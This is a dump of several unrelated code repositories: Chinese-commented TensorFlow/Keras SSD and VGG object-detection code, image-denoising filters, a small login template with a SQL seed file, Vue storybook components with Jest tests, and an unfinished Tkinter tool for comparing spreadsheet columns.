tf.log(feat_h / href) / prior_scaling[2] feat_w = tf.log(feat_w / wref) / prior_scaling[3] # Use SSD ordering: x / y / w / h instead of ours.(m, m, k, 4) feat_localizations = tf.stack([feat_cx, feat_cy, feat_w, feat_h], axis=-1) return feat_labels, feat_localizations, feat_scores ''' 只要修改 img = sd.handle_img('tetst.jpg') 这一行代码就好啦,把你想预测的图片放进去 ''' if __name__ == '__main__': start_time = datetime.datetime.now() sd = ssd() locations, predictions, x = sd.set_net() classes, scores, bboxes = sd.run_this(locations, predictions) sess = tf.Session() ckpt_filename = '../../Nn/ssd_vgg_300_weights.ckpt' sess.run(tf.global_variables_initializer()) saver = tf.train.Saver() saver.restore(sess, ckpt_filename) img = sd.handle_img('../road.jpg') rclasses, rscores, rbboxes = sess.run([classes, scores, bboxes], feed_dict={x: img}) rclasses, rscores, rbboxes = sd.bboxes_sort(rclasses, rscores, rbboxes) rclasses, rscores, rbboxes = sd.bboxes_nms(rclasses, rscores, rbboxes) print(datetime.datetime.now() - start_time) sd.draw_rectangle(sd.img,rclasses,rscores,rbboxes,[[0,0,255],[255,0,0]]) <file_sep>from keras.models import Sequential from keras.layers.core import Flatten, Dropout, Dense from keras.layers.convolutional import Convolution2D, MaxPooling2D import cv2 import numpy as np import warnings import tensorflow as tf class vgg(object): def __init__(self, model_weights): self.model_weights = model_weights self.model = Sequential() self.mean = [103, 93, 116, 79, 123.68] def load_img(self, imgurl): self.img = cv2.imread(imgurl) im = cv2.resize(self.img, (224, 224)).astype(np.floar32) im[:, :, 0] -= self.mean[0] im[:, :, 1] -= self.mean[1] im[:, :, 2] -= self.mean[2] im = np.expand_dims(im, axis=0) # [barch,width,height,channels] return im # Conv卷积操作 Max池化操作 def model_add(self, filter=None, isConv=False, isMax=False, input_shape=None): if isConv: if input_shape: self.model.add( Convolution2D(filters=filter, strides=(1, 1), input_shape=input_shape, kernel_size=(3, 3), activation='relu', padding='same')) else: self.model.add(Convolution2D(filters=filter, strides=(1, 1), activation='relu', padding='same', kernel_size=(3, 3))) if isMax: self.model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2))) # 网络结构 def nn(self): self.model_add(filter=64, isConv=True, input_shape=(224, 224, 3)) self.model_add(64, isConv=True) self.model_add(isMax=True) self.model_add(128, isConv=True) self.model_add(128, isConv=True) self.model_add(isMax=True) self.model_add(256, isConv=True) self.model_add(256, isConv=True) self.model_add(256, isConv=True) self.model_add(isMax=True) self.model_add(512, isConv=True) self.model_add(512, isConv=True) self.model_add(512, isConv=True) self.model_add(isMax=True) self.model_add(512, isConv=True) self.model_add(512, isConv=True) self.model_add(512, isConv=True) self.model_add(isMax=True) self.model.add(Flatten) self.model.add(Dense(4096,activation='relu')) self.model.add(Dropout(.5)) self.model.add(Dense(1000,activation='softmax')) self.model.load_weights('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5') #预测 def pred(self,imgurl): self.nn() cls = open('model/VGG16/classes.txt') lines = cls.readlines() cls.close() img = self.load_img(imgurl) pre = np.argmax(self.model.predict(img)) self.show_img(lines[pre]) def show_img(self,text): cv2.putText(self.img,text,(50,50),cv2.FONT_HERSHEY_SIMPLEX,.5,(0,0,255),1) cv2.imshow('img',self.img) cv2.waitKey(0) cv2.destroyAllWindows() if __name__ == '__name__': net = vgg(model_weights='vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5') net.pred('test.jpg')<file_sep>import tensorflow as tf import numpy as np from SSD import ssd import SSD.tfr_data_process import SSD.preprocess_img_tf import SSD.util_tf import matplotlib.pyplot as plt slim = tf.contrib.slim max_steps = 10000 batch_size = 5 num_epochs_per_decay = 2.0 num_samples_per_epoch = 17125 sd = ssd() # global_step = tf.train.create_global_step() #1----------------->获取所有anchor_boxes layers_anchors = [] for i, s in enumerate(sd.feature_map_size): anchor_bboxes = sd.ssd_anchor_layer(sd.img_size, s, sd.anchor_sizes[i], sd.anchor_ratios[i], sd.anchor_steps[i], sd.boxes_len[i]) layers_anchors.append(anchor_bboxes) # 2-------------->数据加载 dataset = SSD.tfr_data_process.get_split('../TFR_Data', 'voc2012_*.tfrecord', num_classes=21, num_samples=num_samples_per_epoch) image, glabels, ggggbboxes = SSD.tfr_data_process.tfr_read(dataset) image, glabels, gbboxes = \ SSD.preprocess_img_tf.preprocess_image(image, glabels, ggggbboxes, out_shape=(300, 300)) # 2.1 resize # image = SSD.util_tf.resize_image(image,size=(300, 300)) # #2.2 white # image = SSD.util_tf.tf_image_whitened(image) #3----------------> 编码网络 target_labels,target_localizations,target_scores = sd.bboxes_encode(glabels, gbboxes,layers_anchors) batch_shape = [1] + [len(layers_anchors)] * 3 #[1,6,6,6] r = tf.train.batch( # 图片,中心点类别,真实框坐标,得分 SSD.util_tf.reshape_list([image, target_labels, target_localizations, target_scores]), batch_size=batch_size, num_threads=4, capacity=5 * batch_size) batch_queue = slim.prefetch_queue.prefetch_queue( r, capacity=2) b_image, b_gclasses, b_glocalisations, b_gscores = SSD.util_tf.reshape_list(batch_queue.dequeue(), batch_shape) #4----------------------->经过网络 pred_locations,pred_predictions,logit = sd.set_net(x = b_image) cls_pos_loss,cls_neg_loss,loca_loss = sd.ssd_losses(logit,pred_locations, b_gclasses,b_glocalisations,b_gscores) total_loss = tf.reduce_sum([cls_neg_loss,cls_pos_loss,loca_loss]) # global_step = tf.Variable(0) ''' 这里learning_rate 采用指数衰减法, decayed_learning_rate=learining_rate*decay_rate^(global_step/decay_steps) learning_rate为事先设定的初始学习率; decay_rate为衰减系数; decay_steps为衰减速度。 global_step:全局步数 而tf.train.exponential_decay函数则可以通过staircase(默认值为False,当为True时, (global_step/decay_steps)则被转化为整数) ,选择不同的衰减方式。 ''' global_step = tf.train.create_global_step() decay_steps = int(num_samples_per_epoch / batch_size * num_epochs_per_decay) learning_rate = tf.train.exponential_decay(0.01, global_step, decay_steps, 0.94, # learning_rate_decay_factor, staircase=True, name='exponential_decay_learning_rate') optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(total_loss,global_step=global_step) init_op = tf.initialize_all_variables() print('开始训练') with tf.Session() as sess: loss_array = [] coord = tf.train.Coordinator() threads = tf.train.start_queue_runners(sess=sess, coord=coord) sess.run(init_op) # print('batch_queue', sess.run(batch_queue)) for step in range(max_steps): # sess.run(optimizer) loss_value = sess.run(total_loss) loss_array.append(loss_value) print("第%d次的误差为:%f" % (step, loss_value)) # print('no_',sess.run(no_classes)) if step == 300: plt.plot([i for i in range(len(loss_array))], loss_array) plt.show() coord.request_stop() coord.join(threads) <file_sep>import cv2 import numpy as np import PIL ######################################NLM def psnr(A, B): return 10 * np.log(255 * 255.0 / (((A.astype(np.float) - B) ** 2).mean())) / np.log(10) def double2uint8(I, ratio=1.0): return np.clip(np.round(I * ratio), 0, 255).astype(np.uint8) def make_kernel(f): kernel = np.zeros((2 * f + 1, 2 * f + 1)) for d in range(1, f + 1): kernel[f - d:f + d + 1, f - d:f + d + 1] += (1.0 / ((2 * d + 1) ** 2)) return kernel / kernel.sum() def NLmeansfilter(I, h_=10, templateWindowSize=5, searchWindowSize=11): f = templateWindowSize / 2 t = searchWindowSize / 2 height, width = I.shape[:2] padLength = t + f I2 = np.pad(I, padLength, 'symmetric') kernel = make_kernel(f) h = (h_ ** 2) I_ = I2[padLength - f:padLength + f + height, padLength - f:padLength + f + width] average = np.zeros(I.shape) sweight = np.zeros(I.shape) wmax = np.zeros(I.shape) for i in range(-t, t + 1): for j in range(-t, t + 1): if i == 0 and j == 0: continue I2_ = I2[padLength + i - f:padLength + i + f + height, padLength + j - f:padLength + j + f + width] w = np.exp(-cv2.filter2D((I2_ - I_) ** 2, -1, kernel) / h)[f:f + height, f:f + width] sweight += w wmax = np.maximum(wmax, w) average += (w * I2_[f:f + height, f:f + width]) return (average + wmax * I) / (sweight + wmax) def NLM(I): sigma = 20.0 I1 = double2uint8(I + np.random.randn(*I.shape) * sigma) #print(u'噪声图像PSNR', psnr(I, I1)) R1 = cv2.medianBlur(I1, 5) #print(u'中值滤波PSNR', psnr(I, R1)) R2 = cv2.fastNlMeansDenoising(I1, None, sigma, 5, 11) #print(u'opencv的NLM算法', psnr(I, R2)) #R3 = double2uint8(NLmeansfilter(I1.astype(np.float), sigma, 5, 11)) #print(u'NLM PSNR', psnr(I, R3)) return R2 ######################################NLM ######################################Sobel def Sobel(I): source = I #cv2.imshow('source', source) # source=source.astype(np.float32) # sobel_x:发现垂直边缘 sobel_x = cv2.Sobel(source, cv2.CV_64F, 1, 0) # sobel_y:发现水平边缘 sobel_y = cv2.Sobel(source, cv2.CV_64F, 0, 1) # sobel_x = np.uint8(np.absolute(sobel_x)) # sobel_y = np.uint8(np.absolute(sobel_y)) np.set_printoptions(threshold=np.inf) # print(sobel_x) # sobelCombined = cv2.bitwise_or(sobel_x, sobel_y) # 按位或 sum = double2uint8(np.sqrt(np.power(sobel_x, 2) + np.power(sobel_y, 2))) return sum ######################################Sobel ######################################Main if __name__ == '__main__': I = cv2.imread('4.tiff', 0) J = cv2.threshold(I,127,255,cv2.THRESH_BINARY) #cv2.adaptiveThreshold() cv2.imshow('1',I) Image('2', J) n = NLM(I) s = Sobel(n) img_add = np.zeros(shape=(I.shape[0], I.shape[1]), dtype=np.float64) img_add += n img_add += s img_add = double2uint8(img_add) cv2.imshow('img', img_add) cv2.waitKey() ######################################Main <file_sep>import os import tensorflow as tf slim = tf.contrib.slim def get_split(tfr_path, tfr_pattren, num_classes=21, num_samples=17125): # ===============TFR文件名匹配模板=============== tfr_pattren = os.path.join(tfr_path, tfr_pattren) # =========阅读器========= reader = tf.TFRecordReader # ===================解码器=================== keys_to_features = { # 解码TFR文件方式 'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''), 'image/format': tf.FixedLenFeature((), tf.string, default_value='jpeg'), 'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32), 'image/object/bbox/ymin': tf.VarLenFeature(dtype=tf.float32), 'image/object/bbox/xmax': tf.VarLenFeature(dtype=tf.float32), 'image/object/bbox/ymax': tf.VarLenFeature(dtype=tf.float32), 'image/object/bbox/label': tf.VarLenFeature(dtype=tf.int64), } items_to_handlers = { # 解码二进制数据 # 图像解码设置蛮有意思的 'image': slim.tfexample_decoder.Image('image/encoded', 'image/format'), 'object/bbox': slim.tfexample_decoder.BoundingBox( ['ymin', 'xmin', 'ymax', 'xmax'], 'image/object/bbox/'), 'object/label': slim.tfexample_decoder.Tensor('image/object/bbox/label'), } decoder = slim.tfexample_decoder.TFExampleDecoder(keys_to_features, items_to_handlers) # =======描述字段======= items_to_descriptions = { 'image': 'A color image of varying height and width.', 'shape': 'Shape of the image', 'object/bbox': 'A list of bounding boxes, one per each object.', 'object/label': 'A list of labels, one per each object.', } return slim.dataset.Dataset( data_sources=tfr_pattren, # TFR文件名 reader=reader, # 阅读器 decoder=decoder, # 解码器 num_samples=num_samples, # 数目 items_to_descriptions=items_to_descriptions, # decoder条目描述字段 num_classes=num_classes, # 类别数 labels_to_names=None # 字典{图片:类别,……} ) def tfr_read(dataset): # 涉及队列操作,本部使用CPU设备 provider = slim.dataset_data_provider.DatasetDataProvider( dataset, # DatasetDataProvider 需要 slim.dataset.Dataset 做参数 num_readers=2, common_queue_capacity=20 * 5, common_queue_min=10 * 5, shuffle=True) image, glabels, gbboxes = provider.get(['image', 'object/label', 'object/bbox']) return image, glabels, gbboxes <file_sep>import tensorflow as tf from tensorflow.python.ops import control_flow_ops import numpy as np slim = tf.contrib.slim _R_MEAN = 123.68 _G_MEAN = 116.78 _B_MEAN = 103.94 _RESIZE_SIDE_MIN = 256 _RESIZE_SIDE_MAX = 512 def tensor_shape(x, rank=3): """Returns the dimensions of a tensor. """ if x.get_shape().is_fully_defined(): return x.get_shape().as_list() else: # get_shape返回值,with_rank相当于断言assert,是否rank为指定值 static_shape = x.get_shape().with_rank(rank).as_list() # tf.shape返回张量,其中num解释为"The length of the dimension `axis`.",axis默认为0 dynamic_shape = tf.unstack(tf.shape(x), num=rank) # list,有定义的给数字,没有的给tensor return [s if s is not None else d for s, d in zip(static_shape, dynamic_shape)] def abs_smooth(x): #l1平滑误差 """Smoothed absolute function. Useful to compute an L1 smooth error. Define as: x^2 / 2 if abs(x) < 1 abs(x) - 0.5 if abs(x) > 1 We use here a differentiable definition using min(x) and abs(x). Clearly not optimal, but good enough for our purpose! """ absx = tf.abs(x) minx = tf.minimum(absx, 1) r = 0.5 * ((absx - 1) * minx + absx) return r def reshape_list(l, shape=None): """Reshape list of (list): 1D to 2D or the other way around. Args: l: List or List of list. shape: 1D or 2D shape. Return Reshaped list. """ r = [] if shape is None: # Flatten everything. for a in l: if isinstance(a, (list, tuple)): r = r + list(a) else: r.append(a) else: # Reshape to list of list. i = 0 for s in shape: if s == 1: r.append(l[i]) else: r.append(l[i:i + s]) i += s return r def resize_image(image, size, method=tf.image.ResizeMethod.BILINEAR, align_corners=False): """Resize an image and bounding boxes. """ # Resize image. with tf.name_scope('resize_image'): height, width, channels = tensor_shape(image) image = tf.expand_dims(image, 0) image = tf.image.resize_images(image, size, method, align_corners) image = tf.reshape(image, tf.stack([size[0], size[1], channels])) return image def _check3dimage(image, require_static=True): """Assert that we are working with properly shaped image. Args: image: 3-D Tensor of shape [height, width, channels] require_static: If `True`, requires that all dimensions of `image` are known and non-zero. Raises: ValueError: if `image.shape` is not a 3-vector. Returns: An empty list, if `image` has fully defined dimensions. Otherwise, a list containing an assert op is returned. """ try: image_shape = image.get_shape().with_rank(3) except ValueError: raise ValueError("'image' must be three-dimensional.") if require_static and not image_shape.is_fully_defined(): raise ValueError("'image' must be fully defined.") if any(x == 0 for x in image_shape): raise ValueError("all dims of 'image.shape' must be > 0: %s" % image_shape) if not image_shape.is_fully_defined(): return [tf.assert_positive(tf.shape(image), ["all dims of 'image.shape' " "must be > 0."])] else: return [] def random_flip_left_right(image, bboxes, seed=None): """Random flip left-right of an image and its bounding boxes. 随机翻转图像及其边界框的左右两侧。 """ def flip_bboxes(bboxes): """Flip bounding boxes coordinates. """ bboxes = tf.stack([bboxes[:, 0], 1 - bboxes[:, 3], bboxes[:, 2], 1 - bboxes[:, 1]], axis=-1) return bboxes # Random flip. Tensorflow implementation. with tf.name_scope('random_flip_left_right'): image = tf.convert_to_tensor(image, name='image') _check3dimage(image, require_static=False) uniform_random = tf.random_uniform([], 0, 1.0, seed=seed) mirror_cond = tf.less(uniform_random, .5) # Flip image. result = tf.cond(mirror_cond, lambda: tf.reverse_v2(image, [1]), lambda: image) # Flip bboxes. bboxes = tf.cond(mirror_cond, lambda: flip_bboxes(bboxes), lambda: bboxes) image_shape = image.get_shape() result.set_shape(image_shape) return result, bboxes def tf_image_whitened(image, means=(_R_MEAN, _G_MEAN, _B_MEAN)): """Subtracts the given means from each image channel. Returns: the centered image. """ if image.get_shape().ndims != 3: raise ValueError('Input must be of size [height, width, C>0]') num_channels = image.get_shape().as_list()[-1] if len(means) != num_channels: raise ValueError('len(means) must match the number of channels') mean = tf.constant(means, dtype=image.dtype) image = image - mean return image def distort_color(image, color_ordering=0, fast_mode=True, scope=None): #扭曲颜色 """Distort the color of a Tensor image. Each color distortion is non-commutative and thus ordering of the color ops matters. Ideally we would randomly permute the ordering of the color ops. Rather then adding that level of complication, we select a distinct ordering of color ops for each preprocessing thread. Args: image: 3-D Tensor containing single image in [0, 1]. color_ordering: Python int, a type of distortion (valid values: 0-3). fast_mode: Avoids slower ops (random_hue and random_contrast) scope: Optional scope for name_scope. Returns: 3-D Tensor color-distorted image on range [0, 1] Raises: ValueError: if color_ordering not in [0, 3] """ with tf.name_scope(scope, 'distort_color', [image]): if fast_mode: if color_ordering == 0: image = tf.image.random_brightness(image, max_delta=32. / 255.) image = tf.image.random_saturation(image, lower=0.5, upper=1.5) else: image = tf.image.random_saturation(image, lower=0.5, upper=1.5) image = tf.image.random_brightness(image, max_delta=32. / 255.) else: if color_ordering == 0: image = tf.image.random_brightness(image, max_delta=32. / 255.) image = tf.image.random_saturation(image, lower=0.5, upper=1.5) image = tf.image.random_hue(image, max_delta=0.2) image = tf.image.random_contrast(image, lower=0.5, upper=1.5) elif color_ordering == 1: image = tf.image.random_saturation(image, lower=0.5, upper=1.5) image = tf.image.random_brightness(image, max_delta=32. / 255.) image = tf.image.random_contrast(image, lower=0.5, upper=1.5) image = tf.image.random_hue(image, max_delta=0.2) elif color_ordering == 2: image = tf.image.random_contrast(image, lower=0.5, upper=1.5) image = tf.image.random_hue(image, max_delta=0.2) image = tf.image.random_brightness(image, max_delta=32. / 255.) image = tf.image.random_saturation(image, lower=0.5, upper=1.5) elif color_ordering == 3: image = tf.image.random_hue(image, max_delta=0.2) image = tf.image.random_saturation(image, lower=0.5, upper=1.5) image = tf.image.random_contrast(image, lower=0.5, upper=1.5) image = tf.image.random_brightness(image, max_delta=32. / 255.) else: raise ValueError('color_ordering must be in [0, 3]') # The random_* ops do not necessarily clamp. return tf.clip_by_value(image, 0.0, 1.0) def apply_with_random_selector(x, func, num_cases): """Computes func(x, sel), with sel sampled from [0...num_cases-1]. 随机剪裁 Args: x: input Tensor. func: Python function to apply. num_cases: Python int32, number of cases to sample sel from. Returns: The result of func(x, sel), where func receives the value of the selector as a python integer, but sel is sampled dynamically. """ sel = tf.random_uniform([], maxval=num_cases, dtype=tf.int32) # Pass the real x only to one of the func calls. return control_flow_ops.merge([ func(control_flow_ops.switch(x, tf.equal(sel, case))[1], case) for case in range(num_cases)])[0] def get_init_fn(checkpoint_path, train_dir, checkpoint_exclude_scopes, checkpoint_model_scope, model_name, ignore_missing_vars): """Returns a function run by the chief worker to warm-start the training. Note that the init_fn is only run when initializing the model during the very first global step. Returns: An init function run by the supervisor. """ if checkpoint_path is None: return None # Warn the user if a checkpoint exists in the train_dir. Then ignore. if tf.train.latest_checkpoint(train_dir): tf.logging.info( 'Ignoring --checkpoint_path because a checkpoint already exists in %s' % train_dir) return None exclusions = [] if checkpoint_exclude_scopes: exclusions = [scope.strip() for scope in checkpoint_exclude_scopes.split(',')] variables_to_restore = [] for var in slim.get_model_variables(): excluded = False for exclusion in exclusions: if var.op.name.startswith(exclusion): excluded = True break if not excluded: variables_to_restore.append(var) # Change model scope if necessary. if checkpoint_model_scope is not None: variables_to_restore = \ {var.op.name.replace(model_name, checkpoint_model_scope): var for var in variables_to_restore} if tf.gfile.IsDirectory(checkpoint_path): checkpoint_path = tf.train.latest_checkpoint(checkpoint_path) tf.logging.info('Fine-tuning from %s. Ignoring missing vars: %s' % (checkpoint_path, ignore_missing_vars)) return slim.assign_from_checkpoint_fn( checkpoint_path, variables_to_restore, ignore_missing_vars=ignore_missing_vars) if __name__ == '__main__': a = np.array([[2,3,4],[5,6,7]],dtype=np.float32) a = tf.reshape(a,[3,2]) print(a.shape[-1])
a2c734dc7a5faa6f6f063b0c69e6180b9ca20145
[ "Markdown", "Python" ]
8
Markdown
LeeSamoyed/deep_learning_notes
cbefb32e1429ca06d0e5fac92bd6c4d68ff802ad
dc029d767784c86c22179d6f778da9817c126e79
refs/heads/master
<repo_name>David-Tsui/vue-storybook-template<file_sep>/src/components/CalendarStory/CalendarStory.stories.js import Vue from 'vue'; import { storiesOf } from '@storybook/vue'; import { action } from '@storybook/addon-actions'; import centered from '@storybook/addon-centered/vue'; import { withKnobs } from '@storybook/addon-knobs'; import '@storybook/addon-console'; import README from './README.md'; import CalendarStory from './index'; Vue.component('CalendarStory', CalendarStory); storiesOf('CalendarStory', module) .addDecorator(withKnobs) .addDecorator(centered) .addParameters({ readme: { sidebar: README, }, }) .add('show', () => ({ methods: { log() { action('CalendarStory')(); }, }, render(h) { return <CalendarStory></CalendarStory>; }, })); <file_sep>/tests/unit/LoginPage.spec.js const loginAPI = params => new Promise((resolve) => { const { user, password } = params; setTimeout(() => { const check = user === 'admin' && password === '<PASSWORD>'; if (check) { resolve({ code: '1000', data: {}, }); } else { resolve({ code: '5000', data: {}, message: '用戶名稱或密碼錯誤', }); } }, 1500); }); describe('login api', () => { const response = { code: '1000', data: {}, }; const errorResponse = { code: '5000', data: {}, message: '用戶名稱或密碼錯誤', }; it('測試正常登入', async () => { const params = { user: 'admin', password: '<PASSWORD>', }; const resp = await loginAPI(params); expect(resp).toEqual(response); }); it('測試異常登入', async () => { const params = { user: 'admin', password: '<PASSWORD>', }; expect(await loginAPI(params)).toEqual(errorResponse); }); }); <file_sep>/tests/unit/TaskList.spec.js import Vue from 'vue'; import TaskList from '@/components/TaskList/PureTaskList.vue'; import { withPinnedTasks, withArchivedTasks, withOnlyArchivedTasks, } from '@/components/TaskList/PureTaskList.stories'; it('renders pinned tasks at the start of the list', () => { const Constructor = Vue.extend(TaskList); const vm = new Constructor({ propsData: { tasks: withPinnedTasks }, }).$mount(); const firstTaskPinned = vm.$el.querySelector( '.list-item:first-child.TASK_PINNED', ); // We expect the pinned task to be rendered first, not at the end expect(!Object.is(firstTaskPinned, null)); }); it('renders archived tasks at the end of the list', () => { const Constructor = Vue.extend(TaskList); const vm = new Constructor({ propsData: { tasks: withArchivedTasks }, }).$mount(); const firstTaskPinned = vm.$el.querySelector( '.list-item:last-child.TASK_ARCHIVED', ); // We expect the pinned task to be rendered first, not at the end expect(firstTaskPinned).not.toBe(null); }); it('renders list of all archived', () => { const Constructor = Vue.extend(TaskList); const vm = new Constructor({ propsData: { tasks: withOnlyArchivedTasks }, }).$mount(); const archivedItems = vm.$el.querySelectorAll('.list-item.TASK_ARCHIVED'); // We expect the pinned task to be rendered first, not at the end expect([...archivedItems].length).toBe(withOnlyArchivedTasks.length); }); <file_sep>/src/components/InboxScreen/index.js export { default } from './InboxScreen.vue'; <file_sep>/tests/unit/storybook.js import registerRequireContextHook from 'babel-plugin-require-context-hook/register'; import initStoryshots from '@storybook/addon-storyshots'; // jest.setTimeout(10000); registerRequireContextHook(); initStoryshots(); <file_sep>/src/components/LoginPage/index.js export { default } from './LoginPage.vue'; <file_sep>/stories/3-PureTaskList.stories.js import { storiesOf } from '@storybook/vue'; import { task, methods } from './2-TaskBox.stories'; import TaskList from '../src/components/PureTaskList.vue'; export const defaultTaskList = [ { ...task, id: '1', title: 'Task 1' }, { ...task, id: '2', title: 'Task 2' }, { ...task, id: '3', title: 'Task 3' }, { ...task, id: '4', title: 'Task 4' }, { ...task, id: '5', title: 'Task 5' }, { ...task, id: '6', title: 'Task 6' }, ]; export const withPinnedTasks = [ { id: '1', title: 'Task 1', state: 'TASK_PINNED' }, ...defaultTaskList.slice(1, 6), ]; export const withArchivedTasks = [ ...defaultTaskList, { id: '7', title: 'Task 7', state: 'TASK_ARCHIVED' }, ]; export const withOnlyArchivedTasks = (() => { const types = ['PINNED', 'ARCHIVED']; return defaultTaskList.map((_task) => { const randomIndex = 1; return { ..._task, state: `TASK_${types[randomIndex]}`, }; }); })(); const paddedList = () => ({ template: '<div style="padding: 3rem 8rem;"><story/></div>', }); storiesOf('TaskList', module) .addDecorator(paddedList) .add('default', () => ({ components: { TaskList }, render(h) { return ( <task-list tasks={this.tasks} onArchiveTask={this.onArchiveTask} onPinTask={this.onPinTask} /> ); }, data: () => ({ tasks: defaultTaskList, }), methods, })) .add('withPinnedTasks', () => ({ components: { TaskList }, render(h) { return ( <task-list tasks={this.tasks} onArchiveTask={this.onArchiveTask} onPinTask={this.onPinTask} /> ); }, data: () => ({ tasks: withPinnedTasks, }), methods, })) .add('withArchivedTasks', () => ({ components: { TaskList }, render(h) { return ( <task-list tasks={this.tasks} onArchiveTask={this.onArchiveTask} onPinTask={this.onPinTask} /> ); }, data: () => ({ tasks: withArchivedTasks, }), methods, })) .add('withOnlyArchivedTasks', () => ({ components: { TaskList }, render(h) { return ( <task-list tasks={this.tasks} onArchiveTask={this.onArchiveTask} onPinTask={this.onPinTask} /> ); }, data: () => ({ tasks: withOnlyArchivedTasks, }), methods, })) .add('loading', () => ({ components: { TaskList }, template: '<task-list loading @archiveTask="onArchiveTask" @pinTask="onPinTask"/>', methods, })) .add('empty', () => ({ components: { TaskList }, template: '<task-list @archiveTask="onArchiveTask" @pinTask="onPinTask"/>', methods, })); <file_sep>/src/components/CalendarStory/index.js export { default } from './CalendarStory.vue'; <file_sep>/src/components/CalendarStory/README.md # CalendarStory Markdown - 123 > 456<file_sep>/jest.config.js module.exports = { preset: '@vue/cli-plugin-unit-jest', transformIgnorePatterns: ['/node_modules/(?!(@storybook/.*\\.vue$))'], moduleNameMapper: { '\\.(jpg|jpeg|png|gif|eot|otf|webp|svg|ttf|woff|woff2|mp4|webm|wav|mp3|m4a|aac|oga|md)$': '<rootDir>/__mocks__/fileMock.js', '\\.(css|less)$': '<rootDir>/__mocks__/styleMock.js', }, }; <file_sep>/.storybook/config.js import { addDecorator, addParameters, configure } from '@storybook/vue'; import { addReadme } from 'storybook-readme/vue'; import '../src/index.css'; addDecorator(addReadme); addParameters({ readme: { codeTheme: 'github', } }); // automatically import all files ending in *.stories.js configure(require.context('../src', true, /\.stories\.js$/), module); // configure(require.context('../stories', true, /\.stories\.js$/), module); <file_sep>/src/components/InboxScreen/PureInboxScreen.stories.js import Vue from 'vue'; import Vuex from 'vuex'; import { storiesOf } from '@storybook/vue'; import { action } from '@storybook/addon-actions'; import { withKnobs } from '@storybook/addon-knobs'; import { defaultTaskList } from '../TaskList/PureTaskList.stories'; import '@storybook/addon-console'; import README from './README.md'; import PureInboxScreen from './PureInboxScreen.vue'; Vue.use(Vuex); // eslint-disable-next-line import/prefer-default-export export const store = new Vuex.Store({ state: { tasks: defaultTaskList, }, actions: { pinTask(context, id) { action('pinTask')(id); }, archiveTask(context, id) { action('archiveTask')(id); }, }, }); Vue.component('PureInboxScreen', PureInboxScreen); const paddedList = () => ({ template: '<div style="padding: 3rem 8rem;"><story/></div>', }); storiesOf('PureInboxScreen', module) .addDecorator(withKnobs) .addDecorator(paddedList) .addParameters({ readme: { sidebar: README, }, }) .add('default', () => ({ store, methods: { log() { action('PureInboxScreen')(); }, }, render(h) { return <pure-inbox-screen/>; }, })) .add('error', () => ({ methods: { log() { action('PureInboxScreen')(); }, }, render(h) { return <pure-inbox-screen error={true}/>; }, }));
12e8fc2b6f440812c5ddeff719aa57f4290d667d
[ "JavaScript", "Markdown" ]
12
JavaScript
David-Tsui/vue-storybook-template
037d9be7a96e14ecc72d32ac8af16157212fddbb
60cf963e6b39607789cd709b5688023d66b00757
refs/heads/master
<repo_name>bmedendorp/alpha-blog<file_sep>/config/routes.rb Rails.application.routes.draw do root 'pages#home' get 'about', to: 'pages#about' get 'download', to: 'pages#download' get 'contact', to: 'pages#contact' resources :articles end
e61065e3816968c64bf9048ebfe7209fe71ffa76
[ "Ruby" ]
1
Ruby
bmedendorp/alpha-blog
e00c179c2ac23c62a6589016679d8bde12833c76
7d6b9116f7d8a157ac43d14cfbc83a1ae7613b4e
refs/heads/master
<file_sep>[% INCLUDE header %] <h2> You need to log in </h2> [% FOR m = self.messages; m; END %] <form method="post" id="loginform"> <p>Username: <input name="username"></p> <p>Password: <input name="<PASSWORD>" type="<PASSWORD>"></p> <p><input type="submit" name="Login"></p> </form> [% INCLUDE footer %] <file_sep>CREATE TABLE user ( id integer primary key not null, username, password); INSERT INTO user values (1, "simon", "$1$qbq/wA6Q$C5p.bx1UbNWIu70p8fh18/"); /*test*/
f70e9e30cf3e2eef46fe26b2f8ac0a26145278ab
[ "SQL", "Shell" ]
2
Shell
ashanawebb/canary
9396c1675df1a55b486a79f3a39835a0e4e4b50f
84b839a424a75975ee3aca8afdd35e9dfd0ee132
refs/heads/master
<file_sep>import pandas as pd from tkinter import * from tkinter import messagebox import tkinter as t from tkinter import ttk from tkinter.filedialog import askopenfilename import re root = Tk() global fileDataA global fileDataB # Functions def openFileFunA(): global fileDataA fileTypeA = rAValue.get() if (fileTypeA == 1): fileAName = askopenfilename() fileDataA = pd.read_csv(fileAName) result = [] for i in fileDataA.columns: colChange = re.sub(r' ', '_', i) fileDataA.rename(columns={i: colChange},inplace=True) result.append(colChange) boxA['values'] = result elif (fileTypeA == 2): fileAName = askopenfilename() fileDataA = pd.read_excel(fileAName) result = [] for i in fileDataA.columns: colChange = re.sub(r' ', '_', i) fileDataA.rename(columns={i: colChange}, inplace=True) result.append(colChange) boxA['values'] = result else: messagebox.showwarning("No Format Selected", "Kindly Select Any Format First.") def openFileFunB(): global fileDataB fileTypeB = rBValue.get() if(fileTypeB == 1): fileBName = askopenfilename() fileDataB = pd.read_csv(fileBName) result = [] for i in fileDataB.columns: colChange = re.sub(r' ', '_', i) fileDataB.rename(columns={i: colChange}, inplace=True) result.append(colChange) boxB['values'] = result elif(fileTypeB == 2): fileBName = askopenfilename() fileDataB = pd.read_excel(fileBName) result = [] for i in fileDataB.columns: colChange = re.sub(r' ', '_', i) fileDataB.rename(columns={i: colChange}, inplace=True) result.append(colChange) boxB['values'] = result else: messagebox.showwarning("No Format Selected", "Kindly Select Any Format First.") def deleteResult(): x = tree.get_children() if(x != '()'): for child in x: tree.delete(child) def finalResult(): global fileDataA global fileDataB colAValue = colA.get() colBValue = colB.get() cSeriesA = pd.Series(data = fileDataA[colAValue]) cSeriesB = pd.Series(data = fileDataB[colBValue]) for num in fileDataA.index: if( cSeriesA.iloc[num] != cSeriesB.iloc[num]): tree.insert("", index=num, values=(num+1, cSeriesA.iloc[num], cSeriesB.iloc[num])) # About root windowWidth = root.winfo_screenwidth() windowHeight = root.winfo_screenheight() root.geometry("%dx%d+%d+%d"%(windowWidth/2, windowHeight/2, windowWidth/4, windowHeight/4)) root.minsize(int(windowWidth/2) + 85, int(windowHeight/2)) root.maxsize(windowWidth, windowHeight) root.title("Compare Sheets By <NAME>") root.iconbitmap(r"MY.ico") # Frame on Top ft = Frame(root, bg = "black", borderwidth=4) ft.pack(side="top", pady=3, padx=4, 